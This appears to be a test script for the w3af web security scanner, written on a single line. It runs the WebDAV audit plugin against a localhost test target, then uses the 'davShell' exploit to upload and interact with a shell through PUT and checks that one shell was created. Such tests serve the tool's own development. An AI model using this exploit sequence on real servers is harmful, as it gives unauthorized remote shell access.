# This is a test for file uploads using PUT method, and the exploit of that issue plugins output console,textFile output config textFile set fileName output-w3af.txt set verbose True back output config console set verbose False back audit dav discovery serverHeader back target set target http://localhost/w3af/audit/dav/ back start exploit exploit davShell interact interact 0 ls w endInteraction back assert len(kb.kb.getData('davShell','shell')) == 1 exit